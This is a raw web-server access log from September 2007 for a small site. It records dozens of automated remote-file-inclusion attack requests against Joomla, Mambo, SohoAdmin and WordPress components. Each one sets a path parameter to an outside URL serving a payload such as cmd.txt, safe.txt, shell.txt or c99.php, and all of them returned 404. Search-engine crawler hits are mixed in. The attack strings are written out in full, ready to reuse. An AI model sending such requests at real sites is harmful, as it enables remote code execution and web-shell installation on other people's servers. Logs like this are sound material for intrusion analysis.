82.102.10.236 - - [12/Sep/2007:14:24:13 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://futurehousingsystems.com/images/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
65.99.212.160 - - [12/Sep/2007:14:25:51 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.afarhawaii.com/id.txt? HTTP/1.1" 404 321 "-" "libwww-perl/5.79" "www.projectpr.com"
65.99.212.160 - - [12/Sep/2007:14:25:51 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.afarhawaii.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
65.99.212.160 - - [12/Sep/2007:14:25:52 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.afarhawaii.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
213.239.140.2 - - [12/Sep/2007:14:41:42 -0700] "GET /logs/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
213.239.140.2 - - [12/Sep/2007:14:41:42 -0700] "GET /admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
203.32.125.78 - - [12/Sep/2007:15:07:55 -0700] "GET /logs/access.log//include.php?path[docroot]=http://server-com.tripod.com/id.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.805" "www.projectpr.com"
203.32.125.78 - - [12/Sep/2007:15:07:55 -0700] "GET //include.php?path[docroot]=http://server-com.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
203.32.125.78 - - [12/Sep/2007:15:07:56 -0700] "GET /logs//include.php?path[docroot]=http://server-com.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.49.71.70 - - [12/Sep/2007:15:23:33 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anhalt-info.de/galerie/mediatemp/..%20%20/.../index?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
213.239.140.2 - - [12/Sep/2007:15:34:56 -0700] "GET /logs/access.log/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
74.6.19.120 - - [12/Sep/2007:15:35:00 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
74.6.26.34 - - [12/Sep/2007:15:35:02 -0700] "GET /logs/access_060912.log HTTP/1.0" 200 579569 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
81.49.71.70 - - [12/Sep/2007:15:42:57 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anhalt-info.de/galerie/mediatemp/..%20%20/.../index?? HTTP/1.1" 404 311 "-" "libwww-perl/5.803" "www.projectpr.com"
81.49.71.70 - - [12/Sep/2007:15:42:58 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anhalt-info.de/galerie/mediatemp/..%20%20/.../index?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
122.152.128.49 - - [12/Sep/2007:15:59:45 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Baiduspider+(+http://www.baidu.com/search/spider_jp.html)" "www.projectpr.com"
68.20.55.106 - - [12/Sep/2007:17:13:41 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
80.89.5.20 - - [12/Sep/2007:17:16:52 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_phpshop&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 269 "-" "libwww-perl/5.805" "www.projectpr.com"
189.29.9.98 - - [12/Sep/2007:17:31:04 -0700] "GET /logs/access.loghttp://www.fotos_forum.kit.net/c99.php? HTTP/1.1" 404 299 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.projectpr.com"
68.20.55.106 - - [12/Sep/2007:17:32:54 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
68.20.55.106 - - [12/Sep/2007:17:32:54 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
80.89.5.20 - - [12/Sep/2007:17:43:18 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_phpshop&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 272 "-" "libwww-perl/5.805" "www.projectpr.com"
80.89.5.20 - - [12/Sep/2007:17:43:19 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_phpshop&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
74.6.20.82 - - [12/Sep/2007:17:50:37 -0700] "GET / HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
208.36.144.9 - - [12/Sep/2007:19:25:09 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "projectpr.com"
74.6.23.167 - - [12/Sep/2007:19:38:18 -0700] "GET /services.html HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
81.56.208.143 - - [12/Sep/2007:19:53:47 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
81.56.208.143 - - [12/Sep/2007:19:53:47 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
81.56.208.143 - - [12/Sep/2007:19:53:48 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
74.6.20.164 - - [12/Sep/2007:19:57:16 -0700] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
201.11.217.130 - - [12/Sep/2007:20:03:39 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:14 -0700] "GET /logs/access.log/sohoadmin/includes/webmaster/product_update.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:14 -0700] "GET /logs/access.log/sohoadmin/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:14 -0700] "GET /logs/access.log/sohoadmin/program/modules/mods_full/database_manager/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:14 -0700] "GET /logs/access.log/sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:14 -0700] "GET /logs/access.log/sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:14 -0700] "GET /logs/access.log/sohoadmin/program/modules/menu_system/includes/menu_system/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:14 -0700] "GET /logs/access.log/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:14 -0700] "GET /logs/access.log/sohoadmin/program/modules/mods_full/statistics/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 327 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:14 -0700] "GET /sohoadmin/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:14 -0700] "GET /sohoadmin/program/modules/mods_full/database_manager/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:14 -0700] "GET /sohoadmin/includes/webmaster/product_update.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:14 -0700] "GET /sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:14 -0700] "GET /sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:14 -0700] "GET /sohoadmin/program/modules/menu_system/includes/menu_system/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:14 -0700] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:14 -0700] "GET /sohoadmin/program/modules/mods_full/statistics/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:15 -0700] "GET /logs/sohoadmin/includes/webmaster/product_update.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:15 -0700] "GET /logs/sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:15 -0700] "GET /logs/sohoadmin/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:15 -0700] "GET /logs/sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:15 -0700] "GET /logs/sohoadmin/program/modules/mods_full/database_manager/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:15 -0700] "GET /logs/sohoadmin/program/modules/menu_system/includes/menu_system/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:15 -0700] "GET /logs/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:15 -0700] "GET /logs/sohoadmin/program/modules/mods_full/statistics/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 316 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:16 -0700] "GET /logs/access.log/sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:16 -0700] "GET /sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:17 -0700] "GET /logs/sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:54 -0700] "GET /logs/access.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:54 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:20:09:54 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.97.199.226 - - [12/Sep/2007:20:31:18 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.najogada.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.97.199.226 - - [12/Sep/2007:20:31:18 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.najogada.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.97.199.226 - - [12/Sep/2007:20:31:18 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.najogada.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.191.6.72 - - [12/Sep/2007:21:41:38 -0700] "GET /logs/access.log/image_upload.php?sbp=http://n0ne.net/id.txt? HTTP/1.1" 404 278 "-" "libwww-perl/5.808" "www.projectpr.com"
64.191.6.72 - - [12/Sep/2007:21:41:38 -0700] "GET /image_upload.php?sbp=http://n0ne.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.191.6.72 - - [12/Sep/2007:21:41:38 -0700] "GET /logs/image_upload.php?sbp=http://n0ne.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.191.6.72 - - [12/Sep/2007:21:42:30 -0700] "GET /logs/access.log/image_upload.php?sbp=http://n0ne.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.191.6.72 - - [12/Sep/2007:21:42:31 -0700] "GET /image_upload.php?sbp=http://n0ne.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.191.6.72 - - [12/Sep/2007:21:42:31 -0700] "GET /logs/image_upload.php?sbp=http://n0ne.net/id.txt? HTTP/1.1" 404 280 "-" "libwww-perl/5.808" "www.projectpr.com"
24.222.117.90 - - [12/Sep/2007:21:44:12 -0700] "GET /logs/access.log/admin.remository.php?mosConfig_absolute_path=http://n0ne.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
24.222.117.90 - - [12/Sep/2007:21:44:13 -0700] "GET /admin.remository.php?mosConfig_absolute_path=http://n0ne.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
24.222.117.90 - - [12/Sep/2007:21:44:13 -0700] "GET /logs/admin.remository.php?mosConfig_absolute_path=http://n0ne.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
24.222.117.90 - - [12/Sep/2007:21:46:06 -0700] "GET /logs/access.log/admin.remository.php?mosConfig_absolute_path=http://n0ne.net/id.txt? HTTP/1.1" 404 282 "-" "libwww-perl/5.803" "www.projectpr.com"
24.222.117.90 - - [12/Sep/2007:21:46:07 -0700] "GET /admin.remository.php?mosConfig_absolute_path=http://n0ne.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
24.222.117.90 - - [12/Sep/2007:21:46:07 -0700] "GET /logs/admin.remository.php?mosConfig_absolute_path=http://n0ne.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
212.110.128.68 - - [12/Sep/2007:21:59:01 -0700] "GET /Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 300 "-" "libwww-perl/5.803" "www.projectpr.com"
212.110.128.68 - - [12/Sep/2007:22:02:06 -0700] "GET /logs/access.log/Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
212.110.128.68 - - [12/Sep/2007:22:02:06 -0700] "GET /logs/Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
212.110.128.68 - - [12/Sep/2007:22:12:46 -0700] "GET /Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 300 "-" "libwww-perl/5.803" "www.projectpr.com"
212.110.128.68 - - [12/Sep/2007:22:37:34 -0700] "GET /logs/access.log/Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 316 "-" "libwww-perl/5.803" "www.projectpr.com"
212.110.128.68 - - [12/Sep/2007:22:37:34 -0700] "GET /logs/Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
68.20.55.106 - - [12/Sep/2007:22:39:44 -0700] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
68.20.55.106 - - [12/Sep/2007:22:39:45 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
208.36.144.9 - - [12/Sep/2007:22:42:38 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "www.projectpr.com"
201.11.217.130 - - [12/Sep/2007:23:11:00 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
201.11.217.130 - - [12/Sep/2007:23:11:00 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
201.11.217.130 - - [12/Sep/2007:23:20:23 -0700] "GET /logs/access.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 317 "-" "libwww-perl/5.803" "www.projectpr.com"
201.11.217.130 - - [12/Sep/2007:23:20:24 -0700] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
201.11.217.130 - - [12/Sep/2007:23:20:33 -0700] "GET /logs/access.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
201.11.217.130 - - [12/Sep/2007:23:20:33 -0700] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 306 "-" "libwww-perl/5.803" "www.projectpr.com"
68.20.55.106 - - [12/Sep/2007:23:33:39 -0700] "GET /logs/access.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
87.233.133.178 - - [13/Sep/2007:01:19:04 -0700] "GET /logs/access.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
87.233.133.178 - - [13/Sep/2007:01:19:04 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
87.233.133.178 - - [13/Sep/2007:01:19:04 -0700] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
74.6.25.76 - - [13/Sep/2007:01:39:24 -0700] "GET /ICR/Research/Phonics/Bibliography.htm HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
66.195.77.130 - - [13/Sep/2007:03:29:09 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Ocelli/1.4 (http://www.globalspec.com/Ocelli)" "www.projectpr.com"
66.195.77.130 - - [13/Sep/2007:03:29:09 -0700] "GET / HTTP/1.1" 200 10036 "-" "Ocelli/1.4 (http://www.globalspec.com/Ocelli)" "www.projectpr.com"
74.6.19.120 - - [13/Sep/2007:03:38:11 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
74.6.26.40 - - [13/Sep/2007:03:38:12 -0700] "GET /tmp/?D=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
74.6.20.49 - - [13/Sep/2007:04:07:22 -0700] "GET /logs/?D=A HTTP/1.0" 200 3925 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
84.16.240.243 - - [13/Sep/2007:05:09:42 -0700] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://gds.hu/voodoo/crotz? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
84.16.240.243 - - [13/Sep/2007:05:09:43 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://gds.hu/voodoo/crotz? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
84.16.240.243 - - [13/Sep/2007:05:40:47 -0700] "GET /logs/access.log/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://gds.hu/voodoo/crotz? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
203.32.125.78 - - [13/Sep/2007:05:49:21 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=www.infostec.hpg.com.br/spread.jpg? HTTP/1.1" 404 294 "-" "libwww-perl/5.805" "www.projectpr.com"
82.193.238.130 - - [13/Sep/2007:06:44:51 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.buildinginspectionsonline.com.au/mambots/docman/var1.txt? HTTP/1.1" 404 307 "-" "libwww-perl/5.805" "www.projectpr.com"
193.226.105.79 - - [13/Sep/2007:06:54:00 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
193.226.105.79 - - [13/Sep/2007:06:54:00 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.83.139.52 - - [13/Sep/2007:07:12:51 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://indir.savsak.com/shell.txt? HTTP/1.0" 404 277 "-" "Mozilla/4.0 (compatible; Synapse)" "www.projectpr.com"
209.172.57.13 - - [13/Sep/2007:07:42:28 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://www.techcore.org/dmd/locales/en/id.txt? HTTP/1.1" 404 305 "-" "libwww-perl/5.808" "www.projectpr.com"
209.172.57.13 - - [13/Sep/2007:07:42:28 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.techcore.org/dmd/locales/en/id.txt? HTTP/1.1" 404 289 "-" "libwww-perl/5.808" "www.projectpr.com"
209.172.57.13 - - [13/Sep/2007:07:42:28 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.techcore.org/dmd/locales/en/id.txt? HTTP/1.1" 404 294 "-" "libwww-perl/5.808" "www.projectpr.com"
206.225.86.181 - - [13/Sep/2007:07:44:36 -0700] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
206.225.86.181 - - [13/Sep/2007:07:44:36 -0700] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
74.6.29.25 - - [13/Sep/2007:07:56:04 -0700] "GET /logs/access_060812.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
209.172.57.13 - - [13/Sep/2007:07:57:32 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.techcore.org/dmd/locales/en/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.172.57.13 - - [13/Sep/2007:07:57:32 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.techcore.org/dmd/locales/en/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
